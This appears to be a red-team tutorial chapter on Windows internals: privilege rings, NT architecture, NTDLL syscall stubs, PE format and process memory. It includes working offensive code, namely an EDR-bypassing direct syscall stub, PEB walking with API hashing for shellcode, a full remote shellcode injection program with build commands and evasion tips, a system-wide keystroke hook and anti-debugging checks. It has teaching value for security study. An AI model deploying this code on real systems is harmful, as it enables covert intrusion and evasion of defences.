Ring 3 Field Notes

NT internals, syscall mechanics, PE format and the memory model, before any shellcode

You cannot write Windows offensive tooling without knowing what you are standing on. This covers the kernel/user boundary, NT architecture, syscall mechanics, PE format, and memory layout. The stuff that should come before injection tutorials.

before any shellcode

Red team tooling on Windows runs on a specific stack of abstractions. Most tutorials skip to the interesting part: injecting shellcode, unhooking NTDLL, bypassing AMSI. They skip what those operations actually do at the CPU level.

That is a problem. You can copy-paste a process injection snippet without understanding why it works, but you cannot debug it when it breaks, adapt it when defenses change, or write anything original.

This is the floor. Kernel mode. User mode. How they communicate. What lives where. What the PE format is. How memory is organized. The Windows API hierarchy from Win32 down to syscall.


ring 0 and ring 3

The x86/x64 architecture defines four privilege levels, “rings” numbered 0 through 3. Windows uses two of them:

CPU privilege rings — Ring 0 is kernel, Ring 3 is user applications

  • Ring 3 (User Mode): where your applications run. Restricted access to hardware, memory, and CPU instructions. An attempt to execute a privileged instruction raises #GP (General Protection Fault).
  • Ring 0 (Kernel Mode): where the OS kernel, HAL, and device drivers run. Unrestricted. A bug here crashes the entire system.
Ring 3 (User Mode)
├── win32 applications
├── Win32 subsystem (csrss.exe)
├── WoW64 (32-bit on 64-bit)
└── NTDLL.DLL (user-mode stub layer)
         ↕ syscall boundary
Ring 0 (Kernel Mode)
├── NT Executive
│   ├── Object Manager
│   ├── Process Manager
│   ├── Memory Manager
│   ├── I/O Manager
│   ├── Security Reference Monitor
│   └── Cache Manager
├── NT Kernel (ntoskrnl.exe)
├── HAL (hal.dll)
└── Device Drivers (*.sys)

When a user-mode application wants to do anything meaningful (allocate memory, create a process, open a file), it crosses the ring boundary via a system call. This transition is expensive relative to function calls and audited by EDRs.


NT executive and the HAL

Windows NT architecture: User mode (POSIX/Win32/OS2 subsystems) over Kernel mode (System Services, HAL)

The Hardware Abstraction Layer (HAL) sits between the kernel and physical hardware. It abstracts platform-specific differences so the rest of the kernel can be hardware-agnostic.

The NT Executive is the upper layer of ntoskrnl.exe:

Component Responsibility
Object Manager uniform naming and access control for kernel objects
Process Manager process and thread creation, scheduling handoff
Virtual Memory Manager page table management, working set trimming, mapped files
I/O Manager device driver model, IRP dispatch
Security Reference Monitor access checks, audit logging, privilege validation
Cache Manager file system caching, mapped views
Configuration Manager registry implementation

These are components within ntoskrnl.exe, not separate DLLs.

Detailed NT architecture: Executive Services, integral and environment subsystems, kernel-mode drivers, HAL, hardware


the syscall layer: NTDLL and Native API

NTDLL.DLL is the bridge between user mode and the kernel. Each NT function is a thin wrapper that loads a syscall number into eax and executes syscall:

; NtAllocateVirtualMemory stub in NTDLL (Windows 10 21H2)
mov r10, rcx          ; Windows syscall convention: r10 = rcx
mov eax, 0x18         ; System Service Number (SSN)
test byte [SharedUserData+0x308], 0x1
jne  KiFastSystemCall ; legacy path
syscall               ; cross the ring boundary
ret

The number in eax is the System Service Number (SSN). These are not stable across Windows versions. NtAllocateVirtualMemory is 0x18 on Windows 10 21H2 and a different value on Windows 11 22H2.

This matters for direct syscalls: calling syscall directly from your code without going through NTDLL, bypassing userland hooks placed by EDRs.

// direct syscall stub (inline asm, simplified)
// EDR hooks in NTDLL are bypassed entirely
NTSTATUS NtAllocateVirtualMemory_syscall(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
) {
    // SSN resolved at runtime via Hell's Gate or SysWhispers
    NTSTATUS status;
    __asm__ volatile (
        "mov r10, rcx\n"
        "mov eax, %1\n"
        "syscall\n"
        "mov %0, eax\n"
        : "=r"(status)
        : "r"(SSN_NtAllocateVirtualMemory)
        : "r10", "eax", "memory"
    );
    return status;
}

Tools that implement SSN resolution dynamically: SysWhispers3, Hell's Gate, Halo's Gate (handles patched stubs).


the Win32 API hierarchy

General architecture: System Processes → Subsystem DLLs → NTDLL.DLL ↕ Kernel Mode (Executive, Drivers, HAL)

Win32 API (kernel32.dll, user32.dll, advapi32.dll)
           ↓
NTDLL Native API (ntdll.dll)
           ↓
System Call Interface (syscall instruction)
           ↓
NT Executive (ntoskrnl.exe)

CreateProcess() in kernel32.dll calls NtCreateProcess() in ntdll.dll, which executes a syscall into the kernel. The kernel validates arguments, checks security, creates the process object, and returns NTSTATUS.

DLL relationships: GDI32/USER32 and ADVAPI32 → KERNEL32 → KERNELBASE → NTDLL → syscall boundary

EDRs hook at the NTDLL layer (easiest, most stable). Direct syscalls bypass this. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) catch things that slip past NTDLL hooks.


the PE format

PE format on-disk layout: DOS Header, DOS Stub, NT Headers, Section Table, .text/.data/.rdata/.rsrc sections

Every executable, DLL, and driver on Windows uses the Portable Executable format.

┌────────────────────┐
│  DOS Header        │  "MZ" magic, e_lfanew offset to NT headers
├────────────────────┤
│  NT Headers        │  "PE\0\0" + File Header + Optional Header
├────────────────────┤
│  Section Table     │  entries for .text, .data, .rdata, .rsrc
├────────────────────┤
│  .text             │  executable code
├────────────────────┤
│  .data             │  initialized global/static data
├────────────────────┤
│  .rdata            │  read-only data, import/export tables
├────────────────────┤
│  .rsrc             │  resources
└────────────────────┘

Key fields in IMAGE_OPTIONAL_HEADER64:

WORD   Magic;               // 0x20B = PE32+ (64-bit)
DWORD  AddressOfEntryPoint; // RVA of entry point
ULONGLONG ImageBase;        // preferred load address
DWORD  SectionAlignment;    // section alignment in memory
DWORD  FileAlignment;       // section alignment on disk
DWORD  SizeOfImage;         // total image size when mapped
IMAGE_DATA_DIRECTORY DataDirectory[16]; // imports, exports, TLS, relocations...

The Import Address Table (IAT) is populated by the loader when the PE is mapped. It holds the resolved addresses of all imported functions. IAT patching (replacing a function pointer with your own) is one of the simplest hooking techniques.

parsing a PE header in C

#include <windows.h>
#include <stdio.h>

void parse_pe(PVOID base) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return;  // "MZ"

    PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(
        (PBYTE)base + dos->e_lfanew
    );
    if (nt->Signature != IMAGE_NT_SIGNATURE) return;  // "PE\0\0"

    printf("ImageBase:  0x%llx\n", nt->OptionalHeader.ImageBase);
    printf("EntryPoint: 0x%lx (RVA)\n", nt->OptionalHeader.AddressOfEntryPoint);
    printf("Sections:   %d\n", nt->FileHeader.NumberOfSections);

    PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(nt);
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++, sect++) {
        printf("  [%d] %-8s  RVA: 0x%08lx  Size: 0x%lx\n",
               i,
               sect->Name,
               sect->VirtualAddress,
               sect->Misc.VirtualSize);
    }
}

int main() {
    HMODULE h = GetModuleHandleA("kernel32.dll");
    parse_pe(h);
    return 0;
}

process memory layout

Win32 memory map: Stack (grows down), Heap (grows up), Program Image, DLLs, TEB, PEB, Kernel Land at 0x7FFF0000

A user-mode process on Windows x64 has a 128TB virtual address space:

0x0000000000001000   lowest valid user address
...
    [PE image]       the executable itself
    [heap]           grows upward from low addresses
    [mapped files]   DLLs, memory-mapped files
    [stack]          grows downward, default 1MB, max 8MB
...
0x00007FFFFFFFFFFF   highest user-mode address
0xFFFF800000000000   kernel space (inaccessible from ring 3)

The Process Environment Block (PEB) and Thread Environment Block (TEB) are critical structures. gs:[0x60] in 64-bit mode points to the TEB, which contains a pointer to the PEB.


PEB walking: resolve kernel32 without imports

Shellcode cannot use the IAT (it has no image base, no loader). The standard technique is to walk the PEB’s module list and find kernel32.dll by hashing the name.

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

// djb2 hash of a wide string (module names are wide in the PEB)
DWORD hash_module_name(PWSTR name) {
    DWORD h = 5381;
    while (*name)
        h = ((h << 5) + h) + (DWORD)(*name++ | 0x20); // lowercase
    return h;
}

// find a loaded module by name hash
PVOID find_module(DWORD target_hash) {
    PPEB peb;
#ifdef _WIN64
    peb = (PPEB)__readgsqword(0x60);
#else
    peb = (PPEB)__readfsdword(0x30);
#endif

    PPEB_LDR_DATA ldr = peb->Ldr;
    PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
    PLIST_ENTRY cur  = head->Flink;

    while (cur != head) {
        PLDR_DATA_TABLE_ENTRY entry = CONTAINING_RECORD(
            cur,
            LDR_DATA_TABLE_ENTRY,
            InMemoryOrderLinks
        );

        if (entry->BaseDllName.Buffer) {
            DWORD h = hash_module_name(entry->BaseDllName.Buffer);
            if (h == target_hash) {
                return entry->DllBase;
            }
        }
        cur = cur->Flink;
    }
    return NULL;
}

// resolve an exported function by name hash
PVOID find_export(PVOID module_base, DWORD func_hash) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)module_base;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)(
        (PBYTE)module_base + dos->e_lfanew
    );

    DWORD export_rva = nt->OptionalHeader
        .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
        .VirtualAddress;
    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        (PBYTE)module_base + export_rva
    );

    PDWORD  names    = (PDWORD) ((PBYTE)module_base + exports->AddressOfNames);
    PWORD   ordinals = (PWORD)  ((PBYTE)module_base + exports->AddressOfNameOrdinals);
    PDWORD  funcs    = (PDWORD) ((PBYTE)module_base + exports->AddressOfFunctions);

    for (DWORD i = 0; i < exports->NumberOfNames; i++) {
        PCHAR  name = (PCHAR)((PBYTE)module_base + names[i]);
        DWORD  h    = 5381;
        for (PCHAR c = name; *c; c++)
            h = ((h << 5) + h) + (DWORD)*c;

        if (h == func_hash) {
            return (PVOID)((PBYTE)module_base + funcs[ordinals[i]]);
        }
    }
    return NULL;
}

int main() {
    // kernel32.dll hash (djb2 of "kernel32.dll", lowercased)
    PVOID k32 = find_module(0x7040ee75);
    printf("kernel32.dll base: %p\n", k32);

    // VirtualAlloc hash
    PVOID va = find_export(k32, 0x382c0f97);
    printf("VirtualAlloc: %p\n", va);

    return 0;
}

To get the hash values for a specific function:

// compute djb2 hash at compile time (or use a quick script)
DWORD djb2(const char *s) {
    DWORD h = 5381;
    while (*s)
        h = ((h << 5) + h) + (DWORD)*s++;
    return h;
}

// djb2("VirtualAlloc") = 0x382c0f97
// djb2("kernel32.dll") lowercased = 0x7040ee75

This technique works in position-independent shellcode because it has no hardcoded addresses. You can drop this into shellcode as-is (after converting to actual PIC shellcode), and it will resolve functions on any version of Windows as long as kernel32 is loaded.


basic process injection skeleton

With PEB walking established, here is the minimal working injection template using standard Win32 APIs:

#include <windows.h>
#include <stdio.h>

// calc.exe shellcode (x64, msfvenom -p windows/x64/exec CMD=calc.exe -f c)
unsigned char shellcode[] = {
    0x48, 0x31, 0xc9, 0x48, 0x81, 0xe9, 0xdd, 0xff, 0xff, 0xff,
    // ... full shellcode bytes
};
SIZE_T shellcode_len = sizeof(shellcode);

BOOL inject(DWORD pid) {
    HANDLE hProc = OpenProcess(
        PROCESS_ALL_ACCESS,
        FALSE,
        pid
    );
    if (!hProc) {
        printf("[-] OpenProcess failed: %lu\n", GetLastError());
        return FALSE;
    }

    // allocate RWX memory in target process
    PVOID remote_buf = VirtualAllocEx(
        hProc,
        NULL,
        shellcode_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!remote_buf) {
        printf("[-] VirtualAllocEx failed: %lu\n", GetLastError());
        CloseHandle(hProc);
        return FALSE;
    }

    // write shellcode
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProc, remote_buf, shellcode, shellcode_len, &written)) {
        printf("[-] WriteProcessMemory failed: %lu\n", GetLastError());
        VirtualFreeEx(hProc, remote_buf, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return FALSE;
    }

    // create remote thread at shellcode entry point
    HANDLE hThread = CreateRemoteThread(
        hProc,
        NULL,
        0,
        (LPTHREAD_START_ROUTINE)remote_buf,
        NULL,
        0,
        NULL
    );
    if (!hThread) {
        printf("[-] CreateRemoteThread failed: %lu\n", GetLastError());
        VirtualFreeEx(hProc, remote_buf, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return FALSE;
    }

    printf("[+] thread created in PID %lu at %p\n", pid, remote_buf);
    WaitForSingleObject(hThread, 3000);
    CloseHandle(hThread);
    CloseHandle(hProc);
    return TRUE;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("usage: inject.exe <pid>\n");
        return 1;
    }
    DWORD pid = (DWORD)atoi(argv[1]);
    inject(pid);
    return 0;
}

Build:

x86_64-w64-mingw32-gcc inject.c -o inject.exe -lkernel32

Compile in a Windows environment:

cl.exe inject.c /Fe:inject.exe

This is the baseline. EDRs will flag PAGE_EXECUTE_READWRITE allocation immediately. In practice you allocate PAGE_READWRITE, write the shellcode, then VirtualProtectEx to PAGE_EXECUTE_READ. You also replace CreateRemoteThread with NtCreateThreadEx or APC injection to avoid the obvious API pattern. But understand this before touching those variants.


essential native API calls

// memory operations
NtAllocateVirtualMemory(ProcessHandle, &BaseAddress, 0, &RegionSize,
                         MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, Size, &BytesWritten);
NtProtectVirtualMemory(ProcessHandle, &BaseAddress, &RegionSize,
                        PAGE_EXECUTE_READ, &OldProtect);

// process and thread
NtOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttr, &ClientId);
NtCreateThreadEx(&ThreadHandle, THREAD_ALL_ACCESS, NULL,
                  ProcessHandle, StartAddr, Param, 0, 0, 0, 0, NULL);

// information queries
NtQuerySystemInformation(SystemProcessInformation, Buffer, Size, &ReturnLength);
NtQueryInformationProcess(ProcessHandle, ProcessBasicInformation,
                           &PBI, sizeof(PBI), NULL);

NTSTATUS success is 0x00000000. NT_SUCCESS(status) checks the high bit: any value with bit 31 clear is success or informational.


Windows hooks: SetWindowsHookEx

HHOOK hHook = SetWindowsHookEx(
    WH_KEYBOARD_LL,   // low-level keyboard hook, system-wide
    KeyboardProc,     // callback
    NULL,             // NULL for LL hooks (no DLL injection needed)
    0                 // 0 = all threads
);

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION) {
        PKBDLLHOOKSTRUCT kb = (PKBDLLHOOKSTRUCT)lParam;
        printf("key: %lu\n", kb->vkCode);
    }
    return CallNextHookEx(hHook, nCode, wParam, lParam);
}

For WH_KEYBOARD_LL and WH_MOUSE_LL, the callback runs in your process thread (no DLL injection). For other hook types (WH_KEYBOARD, WH_CBT), Windows injects your DLL into every relevant process.


vectored exception handling

VEH registers a handler called before any frame-based SEH. Used for debugger detection, hardware breakpoint monitoring, and anti-analysis.

PVOID hVeh = AddVectoredExceptionHandler(1, VehHandler);

LONG WINAPI VehHandler(PEXCEPTION_POINTERS ex) {
    switch (ex->ExceptionRecord->ExceptionCode) {
        case STATUS_SINGLE_STEP:
            // hardware breakpoint hit (DR0-DR3)
            printf("[!] hardware breakpoint at %p\n",
                   ex->ExceptionRecord->ExceptionAddress);
            return EXCEPTION_CONTINUE_EXECUTION;

        case STATUS_ACCESS_VIOLATION:
            return EXCEPTION_CONTINUE_SEARCH;

        default:
            return EXCEPTION_CONTINUE_SEARCH;
    }
}

To detect hardware breakpoints:

CONTEXT ctx = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
GetThreadContext(GetCurrentThread(), &ctx);
if (ctx.Dr0 || ctx.Dr1 || ctx.Dr2 || ctx.Dr3) {
    // breakpoint registers in use, likely debugger attached
}

what’s next

Chapter 2: shellcode development. Position-independent code, PEB walking as actual shellcode (not C), API hashing, encoding and encryption, stager patterns.

Chapter 3: process injection variants. APC injection, NtMapViewOfSection + threadless execution, module stomping, process hollowing.

Build the understanding first. The shellcode makes sense once you know what it is doing and why.


references